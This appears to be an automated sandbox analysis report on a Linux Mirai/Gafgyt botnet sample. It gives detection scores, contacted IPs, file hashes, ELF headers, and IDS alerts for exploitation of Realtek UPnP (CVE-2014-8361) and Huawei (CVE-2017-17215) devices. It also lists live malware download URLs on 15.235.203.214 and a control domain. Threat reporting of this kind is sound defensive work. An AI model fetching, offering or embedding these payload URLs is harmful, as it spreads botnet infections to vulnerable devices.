                      • DNS/IP Info
                      • Is Dropped
                      • Number of created Files
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1477282 Sample: 1gx339YsKN.elf Startdate: 20/07/2024 Architecture: LINUX Score: 100 20 64.61.239.79, 26966, 51636, 52869 RPU-1892US United States 2->20 22 34.133.129.111, 26966, 52869 ATGS-MMD-ASUS United States 2->22 24 99 other IPs or domains 2->24 26 Snort IDS alert for network traffic 2->26 28 Malicious sample detected (through community Yara rule) 2->28 30 Antivirus / Scanner detection for submitted sample 2->30 32 8 other signatures 2->32 8 1gx339YsKN.elf 2->8         started        signatures3 process4 process5 10 1gx339YsKN.elf 8->10         started        process6 12 1gx339YsKN.elf 10->12         started        14 1gx339YsKN.elf 10->14         started        16 1gx339YsKN.elf 10->16         started        18 2 other processes 10->18

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      1gx339YsKN.elf58%ReversingLabsLinux.Backdoor.Gafgyt
                      1gx339YsKN.elf56%VirustotalBrowse
                      1gx339YsKN.elf100%AviraEXP/ELF.Mirai.Z.A
                      1gx339YsKN.elf100%Joe Sandbox ML
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      vector.mineheaven.org1%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                      http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                      http://15.235.203.214/bolonetwork.mips100%Avira URL Cloudmalware
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      vector.mineheaven.org
                      15.235.203.214
                      truetrueunknown
                      NameMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:52869/picdesc.xmlfalse
                        unknown
                        http://127.0.0.1:52869/wanipcn.xmlfalse
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://schemas.xmlsoap.org/soap/encoding/1gx339YsKN.elffalse
                          • URL Reputation: safe
                          unknown
                          http://15.235.203.214/bolonetwork.mips1gx339YsKN.elffalse
                          • Avira URL Cloud: malware
                          unknown
                          http://purenetworks.com/HNAP1/1gx339YsKN.elffalse
                            unknown
                            http://15.235.203.214/bolonetwork.x861gx339YsKN.elffalse
                              unknown
                              http://schemas.xmlsoap.org/soap/envelope/1gx339YsKN.elffalse
                              • URL Reputation: safe
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              223.179.202.229
                              unknownIndia
                              45609BHARTI-MOBILITY-AS-APBhartiAirtelLtdASforGPRSServicefalse
                              4.126.218.137
                              unknownUnited States
                              3356LEVEL3USfalse
                              191.80.105.222
                              unknownArgentina
                              22927TelefonicadeArgentinaARfalse
                              95.142.87.193
                              unknownTajikistan
                              8847TTL-ASTJfalse
                              96.40.179.165
                              unknownUnited States
                              20115CHARTER-20115USfalse
                              165.199.199.93
                              unknownUnited States
                              33132FIBERNET-DIRECTUSfalse
                              167.109.36.203
                              unknownUnited States
                              6057AdministracionNacionaldeTelecomunicacionesUYfalse
                              217.245.45.160
                              unknownGermany
                              3320DTAGInternetserviceprovideroperationsDEfalse
                              131.74.133.8
                              unknownUnited States
                              27046DNIC-ASBLK-27032-27159USfalse
                              12.148.108.18
                              unknownUnited States
                              7018ATT-INTERNET4USfalse
                              68.55.135.254
                              unknownUnited States
                              7922COMCAST-7922USfalse
                              209.155.169.170
                              unknownUnited States
                              393460CNSP-ASNUSfalse
                              103.140.102.62
                              unknownAustralia
                              139253FOITGROUP-AS-APFOITGroupPTYLTDAUfalse
                              145.95.180.163
                              unknownNetherlands
                              1103SURFNET-NLSURFnetTheNetherlandsNLfalse
                              153.66.188.233
                              unknownUnited States
                              14962NCR-252USfalse
                              69.113.91.2
                              unknownUnited States
                              6128CABLE-NET-1USfalse
                              189.96.200.111
                              unknownBrazil
                              26599TELEFONICABRASILSABRfalse
                              126.140.29.65
                              unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                              20.151.177.100
                              unknownUnited States
                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                              92.192.94.222
                              unknownGermany
                              20676PLUSNETDEfalse
                              114.153.237.232
                              unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                              157.31.108.170
                              unknownUnited States
                              8968BT-ITALIAITfalse
                              39.18.72.126
                              unknownKorea Republic of
                              4766KIXS-AS-KRKoreaTelecomKRfalse
                              141.86.133.15
                              unknownUnited States
                              12816MWN-ASDEfalse
                              81.71.37.202
                              unknownChina
                              45090CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompafalse
                              216.193.100.100
                              unknownUnited States
                              17184ATL-CBEYONDUSfalse
                              24.224.6.198
                              unknownUnited States
                              10821PIONEERINTERNETUSfalse
                              182.99.66.214
                              unknownChina
                              4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                              9.75.67.19
                              unknownUnited States
                              3356LEVEL3USfalse
                              170.202.49.232
                              unknownUnited States
                              17166TRAVELERSPCASUSfalse
                              197.90.98.52
                              unknownSouth Africa
                              10474OPTINETZAfalse
                              195.60.171.233
                              unknownUnited Kingdom
                              198395MINFIN-AS198395-ASUAfalse
                              112.155.118.67
                              unknownKorea Republic of
                              17858POWERVIS-AS-KRLGPOWERCOMMKRfalse
                              37.118.194.177
                              unknownItaly
                              30722VODAFONE-IT-ASNITfalse
                              27.182.241.83
                              unknownKorea Republic of
                              9644SKTELECOM-NET-ASSKTelecomKRfalse
                              197.128.22.128
                              unknownMorocco
                              6713IAM-ASMAfalse
                              104.203.163.74
                              unknownUnited States
                              18978ENZUINC-USfalse
                              189.167.176.77
                              unknownMexico
                              8151UninetSAdeCVMXfalse
                              65.36.65.236
                              unknownUnited States
                              7459GRANDECOM-AS1USfalse
                              174.246.2.67
                              unknownUnited States
                              22394CELLCOUSfalse
                              66.54.49.23
                              unknownUnited States
                              5714HPESUSfalse
                              105.228.41.128
                              unknownSouth Africa
                              37457Telkom-InternetZAfalse
                              36.28.90.118
                              unknownChina
                              4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                              203.137.85.187
                              unknownJapan2554IDCF2554IDCFrontierIncJPfalse
                              32.111.12.53
                              unknownUnited States
                              2688ATGS-MMD-ASUSfalse
                              110.203.7.14
                              unknownChina
                              9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                              44.200.82.200
                              unknownUnited States
                              14618AMAZON-AESUSfalse
                              141.88.171.81
                              unknownGermany
                              680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
                              58.51.252.56
                              unknownChina
                              4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                              54.115.211.180
                              unknownUnited States
                              16509AMAZON-02USfalse
                              34.133.129.111
                              unknownUnited States
                              2686ATGS-MMD-ASUStrue
                              81.96.102.90
                              unknownUnited Kingdom
                              5089NTLGBfalse
                              170.42.177.118
                              unknownUnited States
                              264957CoopercitrusCooperativadeProdutoresRuraisBRfalse
                              67.106.252.165
                              unknownUnited States
                              2828XO-AS15USfalse
                              36.37.53.122
                              unknownChina
                              56136LF-HK3FHKSpinnersIndustrialBuildingPhaseIIIHKfalse
                              39.66.253.8
                              unknownChina
                              4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                              35.192.215.249
                              unknownUnited States
                              15169GOOGLEUSfalse
                              96.16.159.58
                              unknownUnited States
                              16625AKAMAI-ASUSfalse
                              128.33.167.236
                              unknownUnited States
                              11488BBN-GWUSfalse
                              159.112.2.56
                              unknownUnited States
                              32982DOE-HQUSfalse
                              62.67.141.75
                              unknownUnited Kingdom
                              44521JAGEX-ASGBfalse
                              158.111.210.116
                              unknownUnited States
                              13611CDCUSfalse
                              134.172.126.38
                              unknownUnited States
                              18128RIKENRIKENPhysicalandChemicalResearchInstituteJPfalse
                              169.190.5.27
                              unknownUnited States
                              37611AfrihostZAfalse
                              128.152.121.180
                              unknownUnited States
                              542ARNETCAfalse
                              123.252.161.119
                              unknownIndia
                              17762HTIL-TTML-IN-APTataTeleservicesMaharashtraLtdINfalse
                              173.172.1.19
                              unknownUnited States
                              11427TWC-11427-TEXASUSfalse
                              120.52.253.150
                              unknownChina
                              133119UNICOM-CNChinaUnicomIPnetworkCNfalse
                              9.197.122.123
                              unknownUnited States
                              3356LEVEL3USfalse
                              125.239.246.28
                              unknownNew Zealand
                              4771SPARKNZSparkNewZealandTradingLtdNZfalse
                              190.23.45.154
                              unknownParaguay
                              27866COPACOPYfalse
                              211.52.43.49
                              unknownKorea Republic of
                              4766KIXS-AS-KRKoreaTelecomKRfalse
                              174.40.24.65
                              unknownUnited States
                              6167CELLCO-PARTUSfalse
                              136.123.120.48
                              unknownUnited States
                              15169GOOGLEUSfalse
                              178.5.215.118
                              unknownGermany
                              3209VODANETInternationalIP-BackboneofVodafoneDEfalse
                              57.238.112.167
                              unknownBelgium
                              2686ATGS-MMD-ASUSfalse
                              5.28.25.19
                              unknownRussian Federation
                              8439AISTTogliattiRussiaRUfalse
                              39.205.73.12
                              unknownIndonesia
                              23693TELKOMSEL-ASN-IDPTTelekomunikasiSelularIDfalse
                              192.74.194.177
                              unknownAustralia
                              1221ASN-TELSTRATelstraCorporationLtdAUfalse
                              112.191.48.184
                              unknownKorea Republic of
                              4766KIXS-AS-KRKoreaTelecomKRfalse
                              64.61.239.79
                              unknownUnited States
                              32946RPU-1892UStrue
                              197.195.100.240
                              unknownEgypt
                              36992ETISALAT-MISREGfalse
                              66.206.239.205
                              unknownCanada
                              23184PERSONACAfalse
                              131.216.60.53
                              unknownUnited States
                              3851NSHE-NEVADANETUSfalse
                              25.173.67.193
                              unknownUnited Kingdom
                              7922COMCAST-7922USfalse
                              155.114.154.239
                              unknownUnited States
                              11003PANDGUSfalse
                              160.216.127.139
                              unknownCzech Republic
                              2852CESNET2CZfalse
                              84.38.82.15
                              unknownPoland
                              21021MULTIMEDIA-ASCableDTVInternetVoiceProviderinPolandfalse
                              138.110.55.98
                              unknownUnited States
                              396349FIVE-COLLEGE-DATA-NETWORK-ASUSfalse
                              211.67.87.1
                              unknownChina
                              4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
                              126.180.198.11
                              unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                              38.64.117.96
                              unknownUnited States
                              174COGENT-174USfalse
                              107.154.171.110
                              unknownUnited States
                              19551INCAPSULAUSfalse
                              97.250.16.24
                              unknownUnited States
                              6167CELLCO-PARTUSfalse
                              102.115.177.236
                              unknownMauritius
                              23889MauritiusTelecomMUfalse
                              42.164.4.37
                              unknownChina
                              4249LILLY-ASUSfalse
                              104.222.67.170
                              unknownUnited States
                              63330ECTCMNUSfalse
                              157.0.223.26
                              unknownChina
                              4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                              114.177.94.79
                              unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                              12.37.252.230
                              unknownUnited States
                              7018ATT-INTERNET4USfalse
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              24.224.6.198NsMBSCHqbQ.elfGet hashmaliciousMiraiBrowse
                                182.99.66.214x86Get hashmaliciousMiraiBrowse
                                  69.113.91.2x86_64Get hashmaliciousMiraiBrowse
                                    mipsel-20220323-0742Get hashmaliciousMirai MoobotBrowse
                                      W9xJReKzmMGet hashmaliciousMiraiBrowse
                                        114.153.237.232n3CBbCBNSR.elfGet hashmaliciousUnknownBrowse
                                          157.31.108.170pIalFdcSk3.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                            56jbliVGLN.elfGet hashmaliciousMirai, MoobotBrowse
                                              197.90.98.52b3astmode.x86Get hashmaliciousMiraiBrowse
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                vector.mineheaven.orgfaBNhIKHq4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                • 15.235.203.214
                                                U6YcZ2TLtT.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                • 15.235.203.214
                                                EVnD2SuX13.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 15.235.203.214
                                                ts2d2a5oFa.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                • 15.235.203.214
                                                EKi4eGLprr.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 15.235.203.214
                                                http://15.235.203.214/bolonetwork.x86Get hashmaliciousUnknownBrowse
                                                • 15.235.203.214
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                LEVEL3USfaBNhIKHq4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                • 9.125.31.31
                                                U6YcZ2TLtT.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                • 4.62.101.190
                                                EVnD2SuX13.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 8.248.56.195
                                                ts2d2a5oFa.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                • 9.42.128.21
                                                SecuriteInfo.com.Riskware.OfferCore.702.11507.exeGet hashmaliciousPrivateLoader, PureLog StealerBrowse
                                                • 4.209.164.61
                                                EKi4eGLprr.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 9.197.96.243
                                                92.249.48.47-skid.ppc-2024-07-20T09_04_20.elfGet hashmaliciousMirai, MoobotBrowse
                                                • 198.31.174.183
                                                92.249.48.47-skid.arm7-2024-07-20T09_04_19.elfGet hashmaliciousMirai, MoobotBrowse
                                                • 9.40.102.204
                                                92.249.48.47-skid.arm-2024-07-20T09_04_18.elfGet hashmaliciousMirai, MoobotBrowse
                                                • 4.9.245.120
                                                92.249.48.47-skid.x86_64-2024-07-20T09_04_18.elfGet hashmaliciousMirai, MoobotBrowse
                                                • 8.124.158.159
                                                TelefonicadeArgentinaARy2b1PHwo8d.exeGet hashmaliciousSmokeLoaderBrowse
                                                • 190.176.104.106
                                                l5EsscvvPL.elfGet hashmaliciousMiraiBrowse
                                                • 209.13.36.37
                                                botx.arm6.elfGet hashmaliciousMiraiBrowse
                                                • 200.41.235.93
                                                botx.arm.elfGet hashmaliciousMiraiBrowse
                                                • 186.62.84.161
                                                botx.arm6.elfGet hashmaliciousMiraiBrowse
                                                • 181.24.7.245
                                                sora.mips.elfGet hashmaliciousMiraiBrowse
                                                • 179.36.75.112
                                                c2swVFiBVZ.elfGet hashmaliciousMiraiBrowse
                                                • 191.85.179.133
                                                X2Yb9u8Ntz.elfGet hashmaliciousMiraiBrowse
                                                • 190.173.139.214
                                                95.214.27.186-x86-2024-07-07T07_12_12.elfGet hashmaliciousMiraiBrowse
                                                • 181.21.10.232
                                                95.214.27.186-mips-2024-07-07T07_12_12.elfGet hashmaliciousMiraiBrowse
                                                • 181.21.231.183
                                                TTL-ASTJI7ldmFS13W.exeGet hashmaliciousPhorpiexBrowse
                                                • 95.142.87.201
                                                jklarm7.elfGet hashmaliciousMiraiBrowse
                                                • 95.142.94.154
                                                BHARTI-MOBILITY-AS-APBhartiAirtelLtdASforGPRSService92.249.48.47-skid.mips-2024-07-20T09_04_16.elfGet hashmaliciousMirai, MoobotBrowse
                                                • 223.184.141.70
                                                GU7Uk4pAQw.elfGet hashmaliciousUnknownBrowse
                                                • 27.61.234.133
                                                l5EsscvvPL.elfGet hashmaliciousMiraiBrowse
                                                • 106.202.148.172
                                                x86.elfGet hashmaliciousMiraiBrowse
                                                • 106.211.164.92
                                                yHIoCL9LQV.elfGet hashmaliciousMiraiBrowse
                                                • 223.185.147.97
                                                botx.arm6.elfGet hashmaliciousMiraiBrowse
                                                • 223.177.18.145
                                                botx.x86.elfGet hashmaliciousMiraiBrowse
                                                • 223.183.15.1
                                                1yBFfYi5Do.elfGet hashmaliciousUnknownBrowse
                                                • 106.214.112.100
                                                botx.arm6.elfGet hashmaliciousMiraiBrowse
                                                • 106.219.178.245
                                                botx.x86.elfGet hashmaliciousMiraiBrowse
                                                • 223.227.39.224
                                                CHARTER-20115UShttp://15.235.203.214/bolonetwork.x86Get hashmaliciousUnknownBrowse
                                                • 104.159.223.113
                                                92.249.48.47-skid.x86_64-2024-07-20T09_04_18.elfGet hashmaliciousMirai, MoobotBrowse
                                                • 131.93.239.84
                                                U8E1VlGTmr.elfGet hashmaliciousMiraiBrowse
                                                • 35.131.236.16
                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                • 71.81.11.25
                                                kz7iLmqRuq.exeGet hashmaliciousQuasarBrowse
                                                • 47.238.128.246
                                                LRMAuF4TbF.elfGet hashmaliciousMiraiBrowse
                                                • 47.38.70.81
                                                GU7Uk4pAQw.elfGet hashmaliciousUnknownBrowse
                                                • 24.158.162.12
                                                https://postilu.xyz/i/Get hashmaliciousUnknownBrowse
                                                • 47.238.98.149
                                                lookworldafs1244.msiGet hashmaliciousUnknownBrowse
                                                • 47.236.100.191
                                                jklarmGet hashmaliciousUnknownBrowse
                                                • 97.88.151.72
                                                No context
                                                No context
                                                No created / dropped files found
                                                File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                                Entropy (8bit):5.505833809084481
                                                TrID:
                                                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                File name:1gx339YsKN.elf
                                                File size:169'000 bytes
                                                MD5:2beb689c25baa0cc6a3a602be940271d
                                                SHA1:6ddbb1ffd273e36ada109eb03dbb8478c7389e1b
                                                SHA256:96b847812fbdb3ccedb2d2e790992e4acaafabef8019506a1e9045ba131aff66
                                                SHA512:f06e9fefbdeebf2d543a24b33220fe23c9bbfb7bda59a0f37ba6cb6f31d6ff6493c89e1f7b2021dc8dd64e4d24460f33b175ef3c29e4271ff51c40daeab1d92f
                                                SSDEEP:3072:YiaSg6nPP4VZbn6P/Zkp94rNIFFn9s8mMwgQue5VJqDiti4u:vaSg6nPP4VZbn6P/Zkpzrzh0JJu
                                                TLSH:11F35B07B5C184FDC4CAC1B45B9EB936ED31F5AD1238B26B27C4AB262E5DD205F2DA40
                                                File Content Preview:.ELF..............>.......@.....@...................@.8...@.......................@.......@...............................................R.......R.............................Q.td....................................................H...._........H........

                                                ELF header

                                                Class:ELF64
                                                Data:2's complement, little endian
                                                Version:1 (current)
                                                Machine:Advanced Micro Devices X86-64
                                                Version Number:0x1
                                                Type:EXEC (Executable file)
                                                OS/ABI:UNIX - System V
                                                ABI Version:0
                                                Entry Point Address:0x400194
                                                Flags:0x0
                                                ELF Header Size:64
                                                Program Header Offset:64
                                                Program Header Size:56
                                                Number of Program Headers:3
                                                Section Header Offset:168360
                                                Section Header Size:64
                                                Number of Section Headers:10
                                                Header String Table Index:9
                                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                NULL0x00x00x00x00x0000
                                                .initPROGBITS0x4000e80xe80x130x00x6AX001
                                                .textPROGBITS0x4001000x1000x1bf460x00x6AX0016
                                                .finiPROGBITS0x41c0460x1c0460xe0x00x6AX001
                                                .rodataPROGBITS0x41c0600x1c0600x42600x00x2A0032
                                                .ctorsPROGBITS0x5202c80x202c80x180x00x3WA008
                                                .dtorsPROGBITS0x5202e00x202e00x100x00x3WA008
                                                .dataPROGBITS0x5203000x203000x8e680x00x3WA0032
                                                .bssNOBITS0x5291800x291680x173e00x00x3WA0032
                                                .shstrtabSTRTAB0x00x291680x3e0x00x0001
                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                LOAD0x00x4000000x4000000x202c00x202c06.45950x5R E0x100000.init .text .fini .rodata
                                                LOAD0x202c80x5202c80x5202c80x8ea00x202980.23210x6RW 0x100000.ctors .dtors .data .bss
                                                GNU_STACK0x00x00x00x00x00.00000x6RW 0x8
                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                07/20/24-23:05:57.822356TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613951052869192.168.2.1457.81.241.118
                                                07/20/24-23:05:59.453008TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24534652869192.168.2.1427.77.179.71
                                                07/20/24-23:05:47.775474TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5352252869192.168.2.14104.253.137.229
                                                07/20/24-23:05:36.343227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4339437215192.168.2.1474.110.183.41
                                                07/20/24-23:05:34.664378TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3700037215192.168.2.1441.88.139.101
                                                07/20/24-23:05:38.945198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5691037215192.168.2.14157.96.111.59
                                                07/20/24-23:05:38.950380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4696237215192.168.2.1441.196.84.124
                                                07/20/24-23:05:47.101729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3877837215192.168.2.14157.198.56.147
                                                07/20/24-23:06:00.233230TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5102052869192.168.2.1420.92.79.193
                                                07/20/24-23:06:00.459661TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23730452869192.168.2.14201.78.138.208
                                                07/20/24-23:05:39.376131TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4918052869192.168.2.1467.159.158.152
                                                07/20/24-23:05:52.544570TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4097252869192.168.2.14155.93.230.5
                                                07/20/24-23:05:59.251572TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5803652869192.168.2.1432.171.130.180
                                                07/20/24-23:06:08.816643TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613837652869192.168.2.14115.251.64.117
                                                07/20/24-23:05:57.913786TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23696652869192.168.2.14141.227.209.24
                                                07/20/24-23:05:40.462908TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4621652869192.168.2.1427.37.230.189
                                                07/20/24-23:05:57.158457TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615032652869192.168.2.14148.121.201.0
                                                07/20/24-23:05:52.513067TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24072052869192.168.2.1486.71.169.225
                                                07/20/24-23:06:02.047373TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3412652869192.168.2.14182.249.57.247
                                                07/20/24-23:05:38.944157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4695037215192.168.2.1454.135.213.18
                                                07/20/24-23:05:58.112994TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5846652869192.168.2.1441.93.92.223
                                                07/20/24-23:07:19.727778TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5178252869192.168.2.14213.161.220.128
                                                07/20/24-23:05:38.747119TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614522452869192.168.2.14121.140.37.67
                                                07/20/24-23:06:23.203920TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5442452869192.168.2.14190.50.4.69
                                                07/20/24-23:05:35.883933TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3821452869192.168.2.149.71.131.31
                                                07/20/24-23:05:38.705914TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3596652869192.168.2.14121.139.236.213
                                                07/20/24-23:06:18.671322TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25528052869192.168.2.14143.84.11.112
                                                07/20/24-23:06:19.887734TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4080852869192.168.2.14216.53.244.127
                                                07/20/24-23:05:58.254464TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5376252869192.168.2.14148.178.56.30
                                                07/20/24-23:06:01.973350TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615209652869192.168.2.14135.8.62.162
                                                07/20/24-23:05:34.653253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4995037215192.168.2.14157.76.186.37
                                                07/20/24-23:05:57.437168TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23545652869192.168.2.14165.228.62.149
                                                07/20/24-23:06:29.960598TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614048852869192.168.2.14223.241.242.252
                                                07/20/24-23:05:58.384426TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5988652869192.168.2.14213.166.217.247
                                                07/20/24-23:05:39.067591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3443237215192.168.2.14157.219.251.88
                                                07/20/24-23:05:45.175557TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5941452869192.168.2.148.108.202.123
                                                07/20/24-23:05:33.830570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5217637215192.168.2.14198.80.229.185
                                                07/20/24-23:05:59.266004TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5672452869192.168.2.14157.159.224.198
                                                07/20/24-23:06:48.642445TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615794652869192.168.2.14177.203.93.50
                                                07/20/24-23:05:35.469824TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4648452869192.168.2.14141.0.4.62
                                                07/20/24-23:05:37.440249TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5817652869192.168.2.14148.2.12.125
                                                07/20/24-23:05:57.234632TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3410052869192.168.2.1463.95.38.63
                                                07/20/24-23:06:07.663982TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25413852869192.168.2.14222.16.169.125
                                                07/20/24-23:06:08.496960TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4185052869192.168.2.1417.167.26.145
                                                07/20/24-23:06:29.102034TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5997452869192.168.2.14121.110.33.111
                                                07/20/24-23:06:08.137793TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3887252869192.168.2.1453.235.185.131
                                                07/20/24-23:05:59.096689TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3751652869192.168.2.1468.46.136.41
                                                07/20/24-23:05:48.761105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4181237215192.168.2.14157.233.195.92
                                                07/20/24-23:05:35.563341TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4491652869192.168.2.1462.135.228.95
                                                07/20/24-23:05:45.412130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5956237215192.168.2.14197.104.169.8
                                                07/20/24-23:06:00.581239TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4810052869192.168.2.14181.39.217.252
                                                07/20/24-23:06:01.297065TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614301852869192.168.2.1477.116.6.110
                                                07/20/24-23:05:45.359662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6033037215192.168.2.1441.46.7.160
                                                07/20/24-23:05:47.016775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4056237215192.168.2.14197.18.49.179
                                                07/20/24-23:05:48.748553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5275637215192.168.2.1441.149.145.81
                                                07/20/24-23:06:02.025297TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4560652869192.168.2.1473.79.90.127
                                                07/20/24-23:05:56.227561TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4675052869192.168.2.1492.115.168.51
                                                07/20/24-23:06:13.319028TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25514052869192.168.2.1478.50.122.206
